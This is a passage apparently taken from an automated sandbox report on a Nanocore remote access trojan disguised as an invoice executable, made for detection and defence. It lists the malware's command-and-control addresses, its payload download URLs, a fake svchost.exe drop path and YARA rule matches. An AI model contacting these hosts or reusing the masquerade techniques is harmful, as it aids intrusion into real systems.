        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb00 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: 185.157.160.233
        Source: Malware configuration extractorURLs: annapro.linkpc.net
        Source: global trafficTCP traffic: 192.168.2.4:49754 -> 185.157.160.233:2212
        Source: global trafficTCP traffic: 192.168.2.4:49778 -> 105.112.108.188:2212
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: Joe Sandbox ViewIP Address: 185.157.160.233 185.157.160.233
        Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
        Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.160.233
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
        Source: global trafficHTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
        Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/A665A0731C4748264DB5C2625CAB61D4.html
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html
        Source: powershell.exe, 00000005.00000003.689761499.00000000027E5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000005.00000003.808326949.0000000008D9E000.00000004.00000001.sdmpString found in binary or memory: http://crl.micros
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
        Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.946142448.0000000004871000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000003.689873810.000000000734E000.00000004.00000001.sdmpString found in binary or memory: https://go.mic
        Source: powershell.exe, 00000005.00000003.782717627.0000000004C23000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899381605.000000000158B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: CN-Invoice-XXXXX9808-19011143287989.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02BCEA70
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02BCAA50
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02BC0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02BCCDE0
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 17_2_013EB018
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 17_2_013EB008
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 22_2_01BFB018
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 22_2_01BFB008
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 22_2_01BF1258
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: invalid certificate
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWQAD ClQ.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966965029.0000000005E90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSKPwSvas.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966591504.0000000005AC0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966591504.0000000005AC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899381605.000000000158B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CN-Invoice-XXXXX9808-19011143287989.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
